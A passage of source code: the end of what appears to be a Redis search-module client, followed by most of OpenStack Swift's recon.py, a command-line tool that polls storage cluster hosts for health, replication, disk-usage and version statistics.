response_callbacks=self.MODULE_CALLBACKS,
transaction=transaction,
shard_hint=shard_hint,
)
p.index_name = self.index_name
return p
class AsyncSearch(Search, AsyncSearchCommands):
class BatchIndexer(Search.BatchIndexer):
"""
A batch indexer allows you to automatically batch
document indexing in pipelines, flushing it every N documents.
"""
async def add_document(
self,
doc_id,
nosave=False,
score=1.0,
payload=None,
replace=False,
partial=False,
no_create=False,
**fields,
):
"""
Add a document to the batch query
"""
self.client._add_document(
doc_id,
conn=self._pipeline,
nosave=nosave,
score=score,
payload=payload,
replace=replace,
partial=partial,
no_create=no_create,
**fields,
)
self.current_chunk += 1
self.total += 1
if self.current_chunk >= self.chunk_size:
await self.commit()
async def commit(self):
"""
Manually commit and flush the batch indexing query
"""
await self._pipeline.execute()
self.current_chunk = 0
def pipeline(self, transaction=True, shard_hint=None):
"""Creates a pipeline for the SEARCH module, that can be used for executing
SEARCH commands, as well as classic core commands.
"""
p = AsyncPipeline(
connection_pool=self.client.connection_pool,
response_callbacks=self.MODULE_CALLBACKS,
transaction=transaction,
shard_hint=shard_hint,
)
p.index_name = self.index_name
return p
class Pipeline(SearchCommands, redis.client.Pipeline):
"""Pipeline for the module."""
class AsyncPipeline(AsyncSearchCommands, redis.asyncio.client.Pipeline):
"""AsyncPipeline for the module."""
``` |
{
"source": "10088/swift",
"score": 2
} |
#### File: swift/cli/recon.py
```python
from __future__ import print_function
from eventlet.green import socket
from six import string_types
from six.moves.urllib.parse import urlparse
from swift.common.utils import (
SWIFT_CONF_FILE, md5_hash_for_file, set_swift_dir)
from swift.common.ring import Ring
from swift.common.storage_policy import POLICIES, reload_storage_policies
import eventlet
import json
import optparse
import time
import sys
import six
import os
if six.PY3:
from eventlet.green.urllib import request as urllib2
else:
from eventlet.green import urllib2
def seconds2timeunit(seconds):
elapsed = seconds
unit = 'seconds'
if elapsed >= 60:
elapsed = elapsed / 60.0
unit = 'minutes'
if elapsed >= 60:
elapsed = elapsed / 60.0
unit = 'hours'
if elapsed >= 24:
elapsed = elapsed / 24.0
unit = 'days'
return elapsed, unit
def size_suffix(size):
suffixes = ['bytes', 'kB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB']
for suffix in suffixes:
if size < 1000:
return "%s %s" % (size, suffix)
size = size // 1000
return "%s %s" % (size, suffix)
class Scout(object):
"""
Obtain swift recon information
"""
def __init__(self, recon_type, verbose=False, suppress_errors=False,
timeout=5):
self.recon_type = recon_type
self.verbose = verbose
self.suppress_errors = suppress_errors
self.timeout = timeout
def scout_host(self, base_url, recon_type):
"""
Perform the actual HTTP request to obtain swift recon telemetry.
:param base_url: the base url of the host you wish to check. str of the
format 'http://127.0.0.1:6200/recon/'
:param recon_type: the swift recon check to request.
:returns: tuple of (recon url used, response body, and status)
"""
url = base_url + recon_type
try:
body = urllib2.urlopen(url, timeout=self.timeout).read()
if six.PY3 and isinstance(body, six.binary_type):
body = body.decode('utf8')
content = json.loads(body)
if self.verbose:
print("-> %s: %s" % (url, content))
status = 200
except urllib2.HTTPError as err:
if not self.suppress_errors or self.verbose:
print("-> %s: %s" % (url, err))
content = err
status = err.code
except (urllib2.URLError, socket.timeout) as err:
if not self.suppress_errors or self.verbose:
print("-> %s: %s" % (url, err))
content = err
status = -1
return url, content, status
def scout(self, host):
"""
Obtain telemetry from a host running the swift recon middleware.
:param host: host to check
:returns: tuple of (recon url used, response body, status, time start
and time end)
"""
base_url = "http://%s:%s/recon/" % (host[0], host[1])
ts_start = time.time()
url, content, status = self.scout_host(base_url, self.recon_type)
ts_end = time.time()
return url, content, status, ts_start, ts_end
def scout_server_type(self, host):
"""
Obtain Server header by calling OPTIONS.
:param host: host to check
:returns: Server type, status
"""
try:
url = "http://%s:%s/" % (host[0], host[1])
req = urllib2.Request(url)
req.get_method = lambda: 'OPTIONS'
conn = urllib2.urlopen(req)
header = conn.info().get('Server')
server_header = header.split('/')
content = server_header[0]
status = 200
except urllib2.HTTPError as err:
if not self.suppress_errors or self.verbose:
print("-> %s: %s" % (url, err))
content = err
status = err.code
except (urllib2.URLError, socket.timeout) as err:
if not self.suppress_errors or self.verbose:
print("-> %s: %s" % (url, err))
content = err
status = -1
return url, content, status
class SwiftRecon(object):
"""
Retrieve and report cluster info from hosts running recon middleware.
"""
def __init__(self):
self.verbose = False
self.suppress_errors = False
self.timeout = 5
self.pool_size = 30
self.pool = eventlet.GreenPool(self.pool_size)
self.check_types = ['account', 'container', 'object']
self.server_type = 'object'
def _gen_stats(self, stats, name=None):
"""Compute various stats from a list of values."""
cstats = [x for x in stats if x is not None]
if len(cstats) > 0:
ret_dict = {'low': min(cstats), 'high': max(cstats),
'total': sum(cstats), 'reported': len(cstats),
'number_none': len(stats) - len(cstats), 'name': name}
ret_dict['average'] = ret_dict['total'] / float(len(cstats))
ret_dict['perc_none'] = \
ret_dict['number_none'] * 100.0 / len(stats)
else:
ret_dict = {'reported': 0}
return ret_dict
def _print_stats(self, stats):
"""
print out formatted stats to console
:param stats: dict of stats generated by _gen_stats
"""
print('[%(name)s] low: %(low)d, high: %(high)d, avg: '
'%(average).1f, total: %(total)d, '
'Failed: %(perc_none).1f%%, no_result: %(number_none)d, '
'reported: %(reported)d' % stats)
def _ptime(self, timev=None):
"""
:param timev: a unix timestamp or None
:returns: a pretty string of the current time or provided time in UTC
"""
if timev:
return time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(timev))
else:
return time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
def get_hosts(self, region_filter, zone_filter, swift_dir, ring_names):
"""
Get a list of hosts in the rings.
:param region_filter: Only list regions matching given filter
:param zone_filter: Only list zones matching given filter
:param swift_dir: Directory of swift config, usually /etc/swift
:param ring_names: Collection of ring names, such as
['object', 'object-2']
:returns: a set of tuples containing the ip and port of hosts
"""
rings = [Ring(swift_dir, ring_name=n) for n in ring_names]
devs = [d for r in rings for d in r.devs if d]
if region_filter is not None:
devs = [d for d in devs if d['region'] == region_filter]
if zone_filter is not None:
devs = [d for d in devs if d['zone'] == zone_filter]
return set((d['ip'], d['port']) for d in devs)
def get_ringmd5(self, hosts, swift_dir):
"""
Compare ring md5sum's with those on remote host
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
:param swift_dir: The local directory with the ring files.
"""
matches = 0
errors = 0
ring_names = set()
if self.server_type == 'object':
for ring_name in os.listdir(swift_dir):
if ring_name.startswith('object') and \
ring_name.endswith('.ring.gz'):
ring_names.add(ring_name)
else:
ring_name = '%s.ring.gz' % self.server_type
ring_names.add(ring_name)
rings = {}
for ring_name in ring_names:
rings[ring_name] = md5_hash_for_file(
os.path.join(swift_dir, ring_name))
recon = Scout("ringmd5", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking ring md5sums" % self._ptime())
if self.verbose:
for ring_file, ring_sum in rings.items():
print("-> On disk %s md5sum: %s" % (ring_file, ring_sum))
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status != 200:
errors = errors + 1
continue
success = True
for remote_ring_file, remote_ring_sum in response.items():
remote_ring_name = os.path.basename(remote_ring_file)
if not remote_ring_name.startswith(self.server_type):
continue
ring_sum = rings.get(remote_ring_name, None)
if remote_ring_sum != ring_sum:
success = False
print("!! %s (%s => %s) doesn't match on disk md5sum" % (
url, remote_ring_name, remote_ring_sum))
if not success:
errors += 1
continue
matches += 1
if self.verbose:
print("-> %s matches." % url)
print("%s/%s hosts matched, %s error[s] while checking hosts." % (
matches, len(hosts), errors))
print("=" * 79)
def get_swiftconfmd5(self, hosts, printfn=print):
"""
Compare swift.conf md5sum with that on remote hosts
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
:param printfn: function to print text; defaults to print()
"""
matches = 0
errors = 0
conf_sum = md5_hash_for_file(SWIFT_CONF_FILE)
recon = Scout("swiftconfmd5", self.verbose, self.suppress_errors,
self.timeout)
printfn("[%s] Checking swift.conf md5sum" % self._ptime())
if self.verbose:
printfn("-> On disk swift.conf md5sum: %s" % (conf_sum,))
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
if response[SWIFT_CONF_FILE] != conf_sum:
printfn("!! %s (%s) doesn't match on disk md5sum" %
(url, response[SWIFT_CONF_FILE]))
else:
matches = matches + 1
if self.verbose:
printfn("-> %s matches." % url)
else:
errors = errors + 1
printfn("%s/%s hosts matched, %s error[s] while checking hosts."
% (matches, len(hosts), errors))
printfn("=" * 79)
def async_check(self, hosts):
"""
Obtain and print async pending statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
scan = {}
recon = Scout("async", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking async pendings" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
scan[url] = response['async_pending']
stats = self._gen_stats(scan.values(), 'async_pending')
if stats['reported'] > 0:
self._print_stats(stats)
else:
print("[async_pending] - No hosts returned valid data.")
print("=" * 79)
def driveaudit_check(self, hosts):
"""
Obtain and print drive audit error statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)]
"""
scan = {}
recon = Scout("driveaudit", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking drive-audit errors" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
scan[url] = response['drive_audit_errors']
stats = self._gen_stats(scan.values(), 'drive_audit_errors')
if stats['reported'] > 0:
self._print_stats(stats)
else:
print("[drive_audit_errors] - No hosts returned valid data.")
print("=" * 79)
def umount_check(self, hosts):
"""
Check for and print unmounted drives
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
unmounted = {}
errors = {}
recon = Scout("unmounted", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Getting unmounted drives from %s hosts..." %
(self._ptime(), len(hosts)))
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
unmounted[url] = []
errors[url] = []
for i in response:
if not isinstance(i['mounted'], bool):
errors[url].append(i['device'])
else:
unmounted[url].append(i['device'])
for host in unmounted:
node = urlparse(host).netloc
for entry in unmounted[host]:
print("Not mounted: %s on %s" % (entry, node))
for host in errors:
node = urlparse(host).netloc
for entry in errors[host]:
print("Device errors: %s on %s" % (entry, node))
print("=" * 79)
def server_type_check(self, hosts):
"""
Check for server types on the ring
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
errors = {}
recon = Scout("server_type_check", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Validating server type '%s' on %s hosts..." %
(self._ptime(), self.server_type, len(hosts)))
for url, response, status in self.pool.imap(
recon.scout_server_type, hosts):
if status == 200:
if response != self.server_type + '-server':
errors[url] = response
print("%s/%s hosts ok, %s error[s] while checking hosts." % (
len(hosts) - len(errors), len(hosts), len(errors)))
for host in errors:
print("Invalid: %s is %s" % (host, errors[host]))
print("=" * 79)
def expirer_check(self, hosts):
"""
Obtain and print expirer statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
stats = {'object_expiration_pass': [], 'expired_last_pass': []}
recon = Scout("expirer/%s" % self.server_type, self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking on expirers" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
stats['object_expiration_pass'].append(
response.get('object_expiration_pass'))
stats['expired_last_pass'].append(
response.get('expired_last_pass'))
for k in stats:
if stats[k]:
computed = self._gen_stats(stats[k], name=k)
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[%s] - No hosts returned valid data." % k)
else:
print("[%s] - No hosts returned valid data." % k)
print("=" * 79)
def _calculate_least_and_most_recent(self, url_time_data):
"""calulate and print the least and most recent urls
Given a list of url and time tuples calulate the most and least
recent timings and print it out.
:param url_time_data: list of url and time tuples: [(url, time_), ..]
"""
least_recent_time = 9999999999
least_recent_url = None
most_recent_time = 0
most_recent_url = None
for url, last in url_time_data:
if last is None:
continue
if last < least_recent_time:
least_recent_time = last
least_recent_url = url
if last > most_recent_time:
most_recent_time = last
most_recent_url = url
if least_recent_url is not None:
host = urlparse(least_recent_url).netloc
if not least_recent_time:
print('Oldest completion was NEVER by %s.' % host)
else:
elapsed = time.time() - least_recent_time
elapsed, elapsed_unit = seconds2timeunit(elapsed)
print('Oldest completion was %s (%d %s ago) by %s.' % (
self._ptime(least_recent_time),
elapsed, elapsed_unit, host))
if most_recent_url is not None:
host = urlparse(most_recent_url).netloc
elapsed = time.time() - most_recent_time
elapsed, elapsed_unit = seconds2timeunit(elapsed)
print('Most recent completion was %s (%d %s ago) by %s.' % (
self._ptime(most_recent_time),
elapsed, elapsed_unit, host))
def reconstruction_check(self, hosts):
"""
Obtain and print reconstructon statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6020), ('127.0.0.2', 6030)])
"""
stats = []
last_stats = []
recon = Scout("reconstruction/%s" % self.server_type, self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking on reconstructors" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
stats.append(response.get('object_reconstruction_time'))
last = response.get('object_reconstruction_last', 0)
last_stats.append((url, last))
if stats:
computed = self._gen_stats(stats,
name='object_reconstruction_time')
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[object_reconstruction_time] - No hosts returned "
"valid data.")
else:
print("[object_reconstruction_time] - No hosts returned "
"valid data.")
self._calculate_least_and_most_recent(last_stats)
print("=" * 79)
def replication_check(self, hosts):
"""
Obtain and print replication statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
stats = {'replication_time': [], 'failure': [], 'success': [],
'attempted': []}
last_stats = []
recon = Scout("replication/%s" % self.server_type, self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking on replication" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
stats['replication_time'].append(
response.get('replication_time',
response.get('object_replication_time', 0)))
repl_stats = response.get('replication_stats')
if repl_stats:
for stat_key in ['attempted', 'failure', 'success']:
stats[stat_key].append(repl_stats.get(stat_key))
last = response.get('replication_last',
response.get('object_replication_last', 0))
last_stats.append((url, last))
for k in stats:
if stats[k]:
if k != 'replication_time':
computed = self._gen_stats(stats[k],
name='replication_%s' % k)
else:
computed = self._gen_stats(stats[k], name=k)
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[%s] - No hosts returned valid data." % k)
else:
print("[%s] - No hosts returned valid data." % k)
self._calculate_least_and_most_recent(last_stats)
print("=" * 79)
def updater_check(self, hosts):
"""
Obtain and print updater statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
stats = []
recon = Scout("updater/%s" % self.server_type, self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking updater times" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
if response['%s_updater_sweep' % self.server_type]:
stats.append(response['%s_updater_sweep' %
self.server_type])
if len(stats) > 0:
computed = self._gen_stats(stats, name='updater_last_sweep')
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[updater_last_sweep] - No hosts returned valid data.")
else:
print("[updater_last_sweep] - No hosts returned valid data.")
print("=" * 79)
def auditor_check(self, hosts):
"""
Obtain and print obj auditor statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
scan = {}
adone = '%s_auditor_pass_completed' % self.server_type
afail = '%s_audits_failed' % self.server_type
apass = '%s_audits_passed' % self.server_type
asince = '%s_audits_since' % self.server_type
recon = Scout("auditor/%s" % self.server_type, self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking auditor stats" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
scan[url] = response
if len(scan) < 1:
print("Error: No hosts available")
return
stats = {}
stats[adone] = [scan[i][adone] for i in scan
if scan[i][adone] is not None]
stats[afail] = [scan[i][afail] for i in scan
if scan[i][afail] is not None]
stats[apass] = [scan[i][apass] for i in scan
if scan[i][apass] is not None]
stats[asince] = [scan[i][asince] for i in scan
if scan[i][asince] is not None]
for k in stats:
if len(stats[k]) < 1:
print("[%s] - No hosts returned valid data." % k)
else:
if k != asince:
computed = self._gen_stats(stats[k], k)
if computed['reported'] > 0:
self._print_stats(computed)
if len(stats[asince]) >= 1:
low = min(stats[asince])
high = max(stats[asince])
total = sum(stats[asince])
average = total / len(stats[asince])
print('[last_pass] oldest: %s, newest: %s, avg: %s' %
(self._ptime(low), self._ptime(high), self._ptime(average)))
print("=" * 79)
def nested_get_value(self, key, recon_entry):
"""
Generator that yields all values for given key in a recon cache entry.
This is for use with object auditor recon cache entries. If the
object auditor has run in parallel, the recon cache will have entries
of the form: {'object_auditor_stats_ALL': { 'disk1': {..},
'disk2': {..},
'disk3': {..},
...}}
If the object auditor hasn't run in parallel, the recon cache will have
entries of the form: {'object_auditor_stats_ALL': {...}}.
The ZBF auditor doesn't run in parallel. However, if a subset of
devices is selected for auditing, the recon cache will have an entry
of the form: {'object_auditor_stats_ZBF': { 'disk1disk2..diskN': {}}
We use this generator to find all instances of a particular key in
these multi-level dictionaries.
"""
for k, v in recon_entry.items():
if isinstance(v, dict):
for value in self.nested_get_value(key, v):
yield value
if k == key:
yield v
def object_auditor_check(self, hosts):
"""
Obtain and print obj auditor statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
all_scan = {}
zbf_scan = {}
atime = 'audit_time'
bprocessed = 'bytes_processed'
passes = 'passes'
errors = 'errors'
quarantined = 'quarantined'
recon = Scout("auditor/object", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking auditor stats " % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
if response['object_auditor_stats_ALL']:
all_scan[url] = response['object_auditor_stats_ALL']
if response['object_auditor_stats_ZBF']:
zbf_scan[url] = response['object_auditor_stats_ZBF']
if len(all_scan) > 0:
stats = {}
stats[atime] = [sum(self.nested_get_value(atime, all_scan[i]))
for i in all_scan]
stats[bprocessed] = [sum(self.nested_get_value(bprocessed,
all_scan[i])) for i in all_scan]
stats[passes] = [sum(self.nested_get_value(passes, all_scan[i]))
for i in all_scan]
stats[errors] = [sum(self.nested_get_value(errors, all_scan[i]))
for i in all_scan]
stats[quarantined] = [sum(self.nested_get_value(quarantined,
all_scan[i])) for i in all_scan]
for k in stats:
if None in stats[k]:
stats[k] = [x for x in stats[k] if x is not None]
if len(stats[k]) < 1:
print("[Auditor %s] - No hosts returned valid data." % k)
else:
computed = self._gen_stats(stats[k],
name='ALL_%s_last_path' % k)
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[ALL_auditor] - No hosts returned valid data.")
else:
print("[ALL_auditor] - No hosts returned valid data.")
if len(zbf_scan) > 0:
stats = {}
stats[atime] = [sum(self.nested_get_value(atime, zbf_scan[i]))
for i in zbf_scan]
stats[bprocessed] = [sum(self.nested_get_value(bprocessed,
zbf_scan[i])) for i in zbf_scan]
stats[errors] = [sum(self.nested_get_value(errors, zbf_scan[i]))
for i in zbf_scan]
stats[quarantined] = [sum(self.nested_get_value(quarantined,
zbf_scan[i])) for i in zbf_scan]
for k in stats:
if None in stats[k]:
stats[k] = [x for x in stats[k] if x is not None]
if len(stats[k]) < 1:
print("[Auditor %s] - No hosts returned valid data." % k)
else:
computed = self._gen_stats(stats[k],
name='ZBF_%s_last_path' % k)
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[ZBF_auditor] - No hosts returned valid data.")
else:
print("[ZBF_auditor] - No hosts returned valid data.")
print("=" * 79)
def sharding_check(self, hosts):
"""
Obtain and print sharding statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6221), ('127.0.0.2', 6231)])
"""
stats = {'sharding_time': [],
'attempted': [], 'failure': [], 'success': []}
recon = Scout("sharding", self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking on sharders" % self._ptime())
least_recent_time = 9999999999
least_recent_url = None
most_recent_time = 0
most_recent_url = None
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
stats['sharding_time'].append(response.get('sharding_time', 0))
shard_stats = response.get('sharding_stats')
if shard_stats:
# Sharding has a ton more stats, like "no_change".
# Not sure if we need them at all, or maybe for -v.
for stat_key in ['attempted', 'failure', 'success']:
stats[stat_key].append(shard_stats.get(stat_key))
last = response.get('sharding_last', 0)
if last is None:
continue
if last < least_recent_time:
least_recent_time = last
least_recent_url = url
if last > most_recent_time:
most_recent_time = last
most_recent_url = url
for k in stats:
if stats[k]:
computed = self._gen_stats(stats[k], name=k)
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[%s] - No hosts returned valid data." % k)
else:
print("[%s] - No hosts returned valid data." % k)
if least_recent_url is not None:
host = urlparse(least_recent_url).netloc
if not least_recent_time:
print('Oldest completion was NEVER by %s.' % host)
else:
elapsed = time.time() - least_recent_time
elapsed, elapsed_unit = seconds2timeunit(elapsed)
print('Oldest completion was %s (%d %s ago) by %s.' % (
self._ptime(least_recent_time),
elapsed, elapsed_unit, host))
if most_recent_url is not None:
host = urlparse(most_recent_url).netloc
elapsed = time.time() - most_recent_time
elapsed, elapsed_unit = seconds2timeunit(elapsed)
print('Most recent completion was %s (%d %s ago) by %s.' % (
self._ptime(most_recent_time),
elapsed, elapsed_unit, host))
print("=" * 79)
def load_check(self, hosts):
"""
Obtain and print load average statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
load1 = {}
load5 = {}
load15 = {}
recon = Scout("load", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking load averages" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
load1[url] = response['1m']
load5[url] = response['5m']
load15[url] = response['15m']
stats = {"1m": load1, "5m": load5, "15m": load15}
for item in stats:
if len(stats[item]) > 0:
computed = self._gen_stats(stats[item].values(),
name='%s_load_avg' % item)
self._print_stats(computed)
else:
print("[%s_load_avg] - No hosts returned valid data." % item)
print("=" * 79)
def quarantine_check(self, hosts):
"""
Obtain and print quarantine statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
objq = {}
conq = {}
acctq = {}
stats = {}
recon = Scout("quarantined", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking quarantine" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
objq[url] = response['objects']
conq[url] = response['containers']
acctq[url] = response['accounts']
for key in response.get('policies', {}):
pkey = "objects_%s" % key
stats.setdefault(pkey, {})
stats[pkey][url] = response['policies'][key]['objects']
stats.update({"objects": objq, "containers": conq, "accounts": acctq})
for item in stats:
if len(stats[item]) > 0:
computed = self._gen_stats(stats[item].values(),
name='quarantined_%s' % item)
self._print_stats(computed)
else:
print("No hosts returned valid data.")
print("=" * 79)
def socket_usage(self, hosts):
"""
Obtain and print /proc/net/sockstat statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
inuse4 = {}
mem = {}
inuse6 = {}
timewait = {}
orphan = {}
recon = Scout("sockstat", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking socket usage" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
inuse4[url] = response['tcp_in_use']
mem[url] = response['tcp_mem_allocated_bytes']
inuse6[url] = response.get('tcp6_in_use', 0)
timewait[url] = response['time_wait']
orphan[url] = response['orphan']
stats = {"tcp_in_use": inuse4, "tcp_mem_allocated_bytes": mem,
"tcp6_in_use": inuse6, "time_wait": timewait,
"orphan": orphan}
for item in stats:
if len(stats[item]) > 0:
computed = self._gen_stats(stats[item].values(), item)
self._print_stats(computed)
else:
print("No hosts returned valid data.")
print("=" * 79)
def disk_usage(self, hosts, top=0, lowest=0, human_readable=False):
"""
Obtain and print disk usage statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
stats = {}
highs = []
lows = []
raw_total_used = []
raw_total_avail = []
percents = {}
top_percents = [(None, 0)] * top
low_percents = [(None, 100)] * lowest
recon = Scout("diskusage", self.verbose, self.suppress_errors,
self.timeout)
# We want to only query each host once, but we don't care
# which of the available ports we use. So we filter hosts by
# constructing a host->port dictionary, since the dict
# constructor ensures each key is unique, thus each host
# appears only once in filtered_hosts.
filtered_hosts = set(dict(hosts).items())
print("[%s] Checking disk usage now" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, filtered_hosts):
if status == 200:
hostusage = []
for entry in response:
if not isinstance(entry['mounted'], bool):
print("-> %s/%s: Error: %s" % (url, entry['device'],
entry['mounted']))
elif entry['mounted']:
used = float(entry['used']) / float(entry['size']) \
* 100.0
raw_total_used.append(entry['used'])
raw_total_avail.append(entry['avail'])
hostusage.append(round(used, 2))
for ident, oused in top_percents:
if oused < used:
top_percents.append(
(url + ' ' + entry['device'], used))
top_percents.sort(key=lambda x: -x[1])
top_percents.pop()
break
for ident, oused in low_percents:
if oused > used:
low_percents.append(
(url + ' ' + entry['device'], used))
low_percents.sort(key=lambda x: x[1])
low_percents.pop()
break
stats[url] = hostusage
for url in stats:
if len(stats[url]) > 0:
# get per host hi/los for another day
low = min(stats[url])
high = max(stats[url])
highs.append(high)
lows.append(low)
for percent in stats[url]:
percents[int(percent)] = percents.get(int(percent), 0) + 1
else:
print("-> %s: Error. No drive info available." % url)
if len(lows) > 0:
low = min(lows)
high = max(highs)
# dist graph shamelessly stolen from https://github.com/gholt/tcod
print("Distribution Graph:")
mul = 69.0 / max(percents.values())
for percent in sorted(percents):
print('% 3d%%%5d %s' % (percent, percents[percent],
'*' * int(percents[percent] * mul)))
raw_used = sum(raw_total_used)
raw_avail = sum(raw_total_avail)
raw_total = raw_used + raw_avail
avg_used = 100.0 * raw_used / raw_total
if human_readable:
raw_used = size_suffix(raw_used)
raw_avail = size_suffix(raw_avail)
raw_total = size_suffix(raw_total)
print("Disk usage: space used: %s of %s" % (raw_used, raw_total))
print("Disk usage: space free: %s of %s" % (raw_avail, raw_total))
print("Disk usage: lowest: %s%%, highest: %s%%, avg: %s%%" %
(low, high, avg_used))
else:
print("No hosts returned valid data.")
print("=" * 79)
if top_percents:
print('TOP %s' % top)
for ident, used in top_percents:
if ident:
url, device = ident.split()
host = urlparse(url).netloc.split(':')[0]
print('%.02f%% %s' % (used, '%-15s %s' % (host, device)))
if low_percents:
print('LOWEST %s' % lowest)
for ident, used in low_percents:
if ident:
url, device = ident.split()
host = urlparse(url).netloc.split(':')[0]
print('%.02f%% %s' % (used, '%-15s %s' % (host, device)))
def time_check(self, hosts, jitter=0.0):
"""
Check a time synchronization of hosts with current time
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
:param jitter: Maximal allowed time jitter
"""
jitter = abs(jitter)
matches = 0
errors = 0
recon = Scout("time", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking time-sync" % self._ptime())
for url, ts_remote, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status != 200:
errors = errors + 1
continue
if (ts_remote + jitter < ts_start or ts_remote - jitter > ts_end):
diff = abs(ts_end - ts_remote)
ts_end_f = self._ptime(ts_end)
ts_remote_f = self._ptime(ts_remote)
print("!! %s current time is %s, but remote is %s, "
"differs by %.4f sec" % (
url,
ts_end_f,
ts_remote_f,
diff))
continue
matches += 1
if self.verbose:
print("-> %s matches." % url)
print("%s/%s hosts matched, %s error[s] while checking hosts." % (
matches, len(hosts), errors))
print("=" * 79)
def version_check(self, hosts):
"""
Check OS Swift version of hosts. Inform if differs.
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
versions = set()
errors = 0
print("[%s] Checking versions" % self._ptime())
recon = Scout("version", self.verbose, self.suppress_errors,
self.timeout)
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status != 200:
errors = errors + 1
continue
versions.add(response['version'])
if self.verbose:
print("-> %s installed version %s" % (
url, response['version']))
if not len(versions):
print("No hosts returned valid data.")
elif len(versions) == 1:
print("Versions matched (%s), "
"%s error[s] while checking hosts." % (
versions.pop(), errors))
else:
print("Versions not matched (%s), "
"%s error[s] while checking hosts." % (
", ".join(sorted(versions)), errors))
print("=" * 79)
def _get_ring_names(self, policy=None):
"""
Retrieve name of ring files.
If no policy is passed and the server type is object,
the ring names of all storage-policies are retrieved.
:param policy: name or index of storage policy, only applicable
with server_type==object.
:returns: list of ring names.
"""
if self.server_type == 'object':
ring_names = [p.ring_name for p in POLICIES if (
p.name == policy or not policy or (
policy.isdigit() and int(policy) == int(p) or
(isinstance(policy, string_types)
and policy in p.aliases)))]
else:
ring_names = [self.server_type]
return ring_names
def main(self):
"""
Retrieve and report cluster info from hosts running recon middleware.
"""
print("=" * 79)
usage = '''
usage: %prog <server_type> [<server_type> [<server_type>]]
[-v] [--suppress] [-a] [-r] [-u] [-d] [-R]
